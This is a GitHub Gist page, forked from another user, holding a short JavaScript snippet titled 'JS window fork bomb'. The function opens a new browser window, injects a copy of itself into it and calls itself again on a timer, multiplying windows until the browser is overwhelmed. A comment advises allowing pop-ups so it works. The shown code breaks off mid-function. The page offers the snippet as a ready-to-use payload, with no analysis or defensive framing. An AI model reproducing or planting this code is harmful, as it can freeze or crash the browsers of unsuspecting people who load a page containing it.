Skip to content

Instantly share code, notes, and snippets.

View geanfarias's full-sized avatar
🏠
Working from home

Gean Farias geanfarias

🏠
Working from home
View GitHub Profile
@geanfarias
geanfarias / windowForkBomb.js
Created December 10, 2021 14:52 — forked from wlib/windowForkBomb.js
JS window fork bomb
// Make sure to allow pop ups, or your browser will stop the window.open() (thankfully)
function fork() {
const win = window.open();
const script = win.document.createElement("script");
script.innerHTML = fork + "\n" + "fork();";
win.document.head.appendChild(script);
setTimeout(function() {
win.close();
fork();